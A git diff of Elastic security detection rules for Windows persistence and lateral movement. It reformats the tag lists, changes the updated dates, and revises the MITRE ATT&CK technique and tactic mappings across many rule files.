-54,7 +54,17 @@ references = [ risk_score = 47 rule_id = "c7ce36c0-32ff-4f9a-bfc2-dcb242bf99f9" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Initial Access", "Data Source: Elastic Endgame", "Use Case: Vulnerability", "Data Source: Elastic Defend", "Data Source: Sysmon", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Data Source: Elastic Endgame", + "Use Case: Vulnerability", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" @@ -67,16 +77,18 @@ event.category : "file" and host.os.type : "windows" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1190" -name = "Exploit Public-Facing Application" -reference = "https://attack.mitre.org/techniques/T1190/" +id = "T1210" +name = "Exploitation of Remote Services" +reference = "https://attack.mitre.org/techniques/T1210/" + [rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" + + [rule.new_terms] field = "new_terms_fields" value = ["file.path", "host.id"] diff --git a/rules/windows/lateral_movement_via_startup_folder_rdp_smb.toml b/rules/windows/lateral_movement_via_startup_folder_rdp_smb.toml index 0c2fd0e28c6..a74ff41d148 100644 --- a/rules/windows/lateral_movement_via_startup_folder_rdp_smb.toml +++ b/rules/windows/lateral_movement_via_startup_folder_rdp_smb.toml @@ -2,7 +2,7 @@ creation_date = "2020/10/19" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -63,7 +63,18 @@ references = [ risk_score = 73 rule_id = "25224a80-5a4a-4b8a-991e-6ab390465c4f" severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Lateral Movement", "Tactic: Persistence", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: SentinelOne", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -80,46 +91,36 @@ file where host.os.type == "windows" and event.type in ("creation", "change") an [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" - [[rule.threat.technique.subtechnique]] id = "T1021.001" name = "Remote Desktop Protocol" reference = "https://attack.mitre.org/techniques/T1021/001/" -[[rule.threat.technique.subtechnique]] -id = "T1021.002" -name = "SMB/Windows Admin Shares" -reference = "https://attack.mitre.org/techniques/T1021/002/" -[[rule.threat.technique]] -id = "T1570" -name = "Lateral Tool Transfer" -reference = "https://attack.mitre.org/techniques/T1570/" [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" - [[rule.threat.technique.subtechnique]] id = "T1547.001" name = "Registry Run Keys / Startup Folder" reference = "https://attack.mitre.org/techniques/T1547/001/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules/windows/lateral_movement_via_wsus_update.toml b/rules/windows/lateral_movement_via_wsus_update.toml index 7737d941df9..22ecd3dc5c9 100644 --- a/rules/windows/lateral_movement_via_wsus_update.toml +++ b/rules/windows/lateral_movement_via_wsus_update.toml @@ -2,7 +2,7 @@ creation_date = "2024/07/19" integration = ["endpoint", "windows", "system", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -63,7 +63,20 @@ references = ["https://www.thehacker.recipes/a-d/movement/mitm-and-coerced-authe risk_score = 47 rule_id = "8e2485b6-a74f-411b-bf7f-38b819f3a846" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Lateral Movement", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Microsoft Defender for Endpoint", "Data Source: Windows Security Event Logs", "Data Source: Crowdstrike", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Windows Security Event Logs", + "Data Source: Crowdstrike", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -79,26 +92,14 @@ process.executable : ( [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1072" -name = "Software Deployment Tools" -reference = "https://attack.mitre.org/techniques/T1072/" +id = "T1210" +name = "Exploitation of Remote Services" +reference = "https://attack.mitre.org/techniques/T1210/" -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1072" -name = "Software Deployment Tools" -reference = "https://attack.mitre.org/techniques/T1072/" [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" + diff --git a/rules/windows/persistence_ad_adminsdholder.toml b/rules/windows/persistence_ad_adminsdholder.toml index 7cc39bbcbf0..3c87f58aebf 100644 --- a/rules/windows/persistence_ad_adminsdholder.toml +++ b/rules/windows/persistence_ad_adminsdholder.toml @@ -2,7 +2,7 @@ creation_date = "2022/01/31" integration = ["system", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/11/14" [rule] author = ["Elastic"] @@ -60,7 +60,16 @@ references = [ risk_score = 73 rule_id = "6e9130a5-9be6-48e5-943a-9628bfc74b18" severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Use Case: Active Directory Monitoring", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Active Directory", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Use Case: Active Directory Monitoring", + "Data Source: Active Directory", + "Data Source: Windows Security Event Logs", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" @@ -71,26 +80,24 @@ event.code:5136 and host.os.type:"windows" and winlog.event_data.ObjectDN:CN=Adm [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.002" +name = "Domain Accounts" +reference = "https://attack.mitre.org/techniques/T1078/002/" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/windows/persistence_adobe_hijack_persistence.toml b/rules/windows/persistence_adobe_hijack_persistence.toml index 92b99f7fa50..06021e79ce1 100644 --- a/rules/windows/persistence_adobe_hijack_persistence.toml +++ b/rules/windows/persistence_adobe_hijack_persistence.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/19" [transform] [[transform.osquery]] @@ -131,13 +131,24 @@ file where host.os.type == "windows" and event.type == "creation" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1554" name = "Compromise Host Software Binary" reference = "https://attack.mitre.org/techniques/T1554/" +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" +[[rule.threat.technique.subtechnique]] +id = "T1574.010" +name = "Services File Permissions Weakness" +reference = "https://attack.mitre.org/techniques/T1574/010/" + + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules/windows/persistence_app_compat_shim.toml b/rules/windows/persistence_app_compat_shim.toml index 6927c5276c6..c99c0974df7 100644 --- a/rules/windows/persistence_app_compat_shim.toml +++ b/rules/windows/persistence_app_compat_shim.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/02" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/08/26" [rule] author = ["Elastic"] @@ -61,7 +61,19 @@ Application Compatibility Shim databases are used in Windows to ensure older app risk_score = 47 rule_id = "c5ce48a6-7f57-4ee8-9313-3d0024caee10" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Data Source: Elastic Endgame", "Data Source: Crowdstrike", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: SentinelOne", + "Data Source: Elastic Endgame", + "Data Source: Crowdstrike", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -87,36 +99,19 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" - [[rule.threat.technique.subtechnique]] id = "T1546.011" name = "Application Shimming" reference = "https://attack.mitre.org/techniques/T1546/011/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1546" -name = "Event Triggered Execution" -reference = "https://attack.mitre.org/techniques/T1546/" - -[[rule.threat.technique.subtechnique]] -id = "T1546.011" -name = "Application Shimming" -reference = "https://attack.mitre.org/techniques/T1546/011/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/windows/persistence_appcertdlls_registry.toml b/rules/windows/persistence_appcertdlls_registry.toml index cd530d7df31..7cad2254650 100644 --- a/rules/windows/persistence_appcertdlls_registry.toml +++ b/rules/windows/persistence_appcertdlls_registry.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/18" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/08/26" [rule] author = ["Elastic"] @@ -61,7 +61,20 @@ AppCert DLLs are dynamic link libraries that can be configured to load with ever risk_score = 47 rule_id = "513f0ffd-b317-4b9c-9494-92ce861f22c7" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Microsoft Defender for Endpoint", "Data Source: Crowdstrike", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Privilege Escalation", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Crowdstrike", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -73,18 +86,36 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" - [[rule.threat.technique.subtechnique]] id = "T1546.009" name = "AppCert DLLs" reference = "https://attack.mitre.org/techniques/T1546/009/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" +[[rule.threat.technique.subtechnique]] +id = "T1546.009" +name = "AppCert DLLs" +reference = "https://attack.mitre.org/techniques/T1546/009/" + + + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/windows/persistence_appinitdlls_registry.toml b/rules/windows/persistence_appinitdlls_registry.toml index f123fa5bc79..350bb9b904f 100644 --- a/rules/windows/persistence_appinitdlls_registry.toml +++ b/rules/windows/persistence_appinitdlls_registry.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/18" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/08/28" [transform] [[transform.osquery]] @@ -116,7 +116,20 @@ This rule identifies modifications on the AppInit registry keys. risk_score = 47 rule_id = "d0e159cf-73e9-40d1-a9ed-077e3158a855" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Data Source: Crowdstrike"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", +] timestamp_override = "event.ingested" type = "eql" @@ -153,18 +166,31 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" - [[rule.threat.technique.subtechnique]] id = "T1546.010" name = "AppInit DLLs" reference = "https://attack.mitre.org/techniques/T1546/010/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1112" +name = "Modify Registry" +reference = "https://attack.mitre.org/techniques/T1112/" + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/persistence_browser_extension_install.toml b/rules/windows/persistence_browser_extension_install.toml index be533d6a05b..2141ad620c4 100644 --- a/rules/windows/persistence_browser_extension_install.toml +++ b/rules/windows/persistence_browser_extension_install.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/22" integration = ["endpoint", "m365_defender", "sentinel_one_cloud_funnel", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/01" [rule] author = ["Elastic"] @@ -115,18 +115,14 @@ file where host.os.type == "windows" and event.type : "creation" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1176" name = "Software Extensions" reference = "https://attack.mitre.org/techniques/T1176/" -[[rule.threat.technique.subtechnique]] -id = "T1176.001" -name = "Browser Extensions" -reference = "https://attack.mitre.org/techniques/T1176/001/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules/windows/persistence_evasion_hidden_local_account_creation.toml b/rules/windows/persistence_evasion_hidden_local_account_creation.toml index deb5c340772..d53df13516f 100644 --- a/rules/windows/persistence_evasion_hidden_local_account_creation.toml +++ b/rules/windows/persistence_evasion_hidden_local_account_creation.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/18" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/08/26" [rule] author = ["Elastic"] @@ -58,7 +58,19 @@ references = [ risk_score = 73 rule_id = "2edc8076-291e-41e9-81e4-e3fcbc97ae5e" severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Persistence", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Data Source: Crowdstrike"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", +] timestamp_override = "event.ingested" type = "eql" @@ -74,36 +86,19 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1564" -name = "Hide Artifacts" -reference = "https://attack.mitre.org/techniques/T1564/" - -[[rule.threat.technique.subtechnique]] -id = "T1564.002" -name = "Hidden Users" -reference = "https://attack.mitre.org/techniques/T1564/002/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1136" name = "Create Account" reference = "https://attack.mitre.org/techniques/T1136/" - [[rule.threat.technique.subtechnique]] id = "T1136.001" name = "Local Account" reference = "https://attack.mitre.org/techniques/T1136/001/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules/windows/persistence_evasion_registry_ifeo_injection.toml b/rules/windows/persistence_evasion_registry_ifeo_injection.toml index d3bf98a2e64..cdf2e8f627a 100644 --- a/rules/windows/persistence_evasion_registry_ifeo_injection.toml +++ b/rules/windows/persistence_evasion_registry_ifeo_injection.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/17" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/08/26" [rule] author = ["Elastic"] @@ -63,7 +63,20 @@ references = [ risk_score = 47 rule_id = "6839c821-011d-43bd-bd5b-acff00257226" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -91,36 +104,31 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" - [[rule.threat.technique.subtechnique]] id = "T1546.012" name = "Image File Execution Options Injection" reference = "https://attack.mitre.org/techniques/T1546/012/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1546" -name = "Event Triggered Execution" -reference = "https://attack.mitre.org/techniques/T1546/" +id = "T1112" +name = "Modify Registry" +reference = "https://attack.mitre.org/techniques/T1112/" -[[rule.threat.technique.subtechnique]] -id = "T1546.012" -name = "Image File Execution Options Injection" -reference = "https://attack.mitre.org/techniques/T1546/012/" [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/persistence_evasion_registry_startup_shell_folder_modified.toml b/rules/windows/persistence_evasion_registry_startup_shell_folder_modified.toml index 92e133bbe17..078d2f2153c 100644 --- a/rules/windows/persistence_evasion_registry_startup_shell_folder_modified.toml +++ b/rules/windows/persistence_evasion_registry_startup_shell_folder_modified.toml @@ -2,7 +2,7 @@ creation_date = "2021/03/15" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/09/11" [transform] [[transform.osquery]] @@ -161,31 +161,31 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1112" -name = "Modify Registry" -reference = "https://attack.mitre.org/techniques/T1112/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" - [[rule.threat.technique.subtechnique]] id = "T1547.001" name = "Registry Run Keys / Startup Folder" reference = "https://attack.mitre.org/techniques/T1547/001/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1112" +name = "Modify Registry" +reference = "https://attack.mitre.org/techniques/T1112/" + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/persistence_group_modification_by_system.toml b/rules/windows/persistence_group_modification_by_system.toml index 3a73e312b2b..ddc052d6393 100644 --- a/rules/windows/persistence_group_modification_by_system.toml +++ b/rules/windows/persistence_group_modification_by_system.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/26" integration = ["system", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/04/23" [rule] author = ["Elastic"] @@ -55,7 +55,16 @@ Active Directory (AD) is a critical component in Windows environments, managing risk_score = 47 rule_id = "6f024bde-7085-489b-8250-5957efdf1caf" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Use Case: Active Directory Monitoring", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Active Directory", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Use Case: Active Directory Monitoring", + "Data Source: Active Directory", + "Data Source: Windows Security Event Logs", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -70,36 +79,26 @@ not group.id : "S-1-5-21-*-513" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" -[[rule.threat.technique.subtechnique]] -id = "T1098.007" -name = "Additional Local or Domain Groups" -reference = "https://attack.mitre.org/techniques/T1098/007/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" -[[rule.threat.technique.subtechnique]] -id = "T1098.007" -name = "Additional Local or Domain Groups" -reference = "https://attack.mitre.org/techniques/T1098/007/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/windows/persistence_local_scheduled_task_creation.toml b/rules/windows/persistence_local_scheduled_task_creation.toml index 991d2a51efd..e0bda7e66c5 100644 --- a/rules/windows/persistence_local_scheduled_task_creation.toml +++ b/rules/windows/persistence_local_scheduled_task_creation.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -60,7 +60,15 @@ references = [ risk_score = 21 rule_id = "afcce5ad-65de-4ed2-8516-5e093d3ac99a" severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Data Source: Sysmon", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Resources: Investigation Guide", +] type = "eql" query = ''' @@ -83,36 +91,19 @@ sequence with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" - [[rule.threat.technique.subtechnique]] id = "T1053.005" name = "Scheduled Task" reference = "https://attack.mitre.org/techniques/T1053/005/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1053" -name = "Scheduled Task/Job" -reference = "https://attack.mitre.org/techniques/T1053/" - -[[rule.threat.technique.subtechnique]] -id = "T1053.005" -name = "Scheduled Task" -reference = "https://attack.mitre.org/techniques/T1053/005/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/windows/persistence_local_scheduled_task_scripting.toml b/rules/windows/persistence_local_scheduled_task_scripting.toml index a12faf74c32..f8f93d54439 100644 --- a/rules/windows/persistence_local_scheduled_task_scripting.toml +++ b/rules/windows/persistence_local_scheduled_task_scripting.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/29" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -28,7 +28,17 @@ Decode the base64 encoded Tasks Actions registry value to investigate the task's risk_score = 47 rule_id = "689b9d57-e4d5-4357-ad17-9c334609d79a" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Resources: Investigation Guide", +] type = "eql" query = ''' @@ -47,18 +57,41 @@ sequence by host.id with maxspan = 30s [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" - [[rule.threat.technique.subtechnique]] id = "T1053.005" name = "Scheduled Task" reference = "https://attack.mitre.org/techniques/T1053/005/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.005" +name = "Visual Basic" +reference = "https://attack.mitre.org/techniques/T1059/005/" + + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/windows/persistence_msds_alloweddelegateto_krbtgt.toml b/rules/windows/persistence_msds_alloweddelegateto_krbtgt.toml index a4b61f8ccd1..68aedd06281 100644 --- a/rules/windows/persistence_msds_alloweddelegateto_krbtgt.toml +++ b/rules/windows/persistence_msds_alloweddelegateto_krbtgt.toml @@ -2,7 +2,7 @@ creation_date = "2022/01/27" integration = ["system", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/11/14" [rule] author = ["Elastic"] @@ -72,7 +72,16 @@ Audit User Account Management (Success,Failure) ``` """ severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Use Case: Active Directory Monitoring", 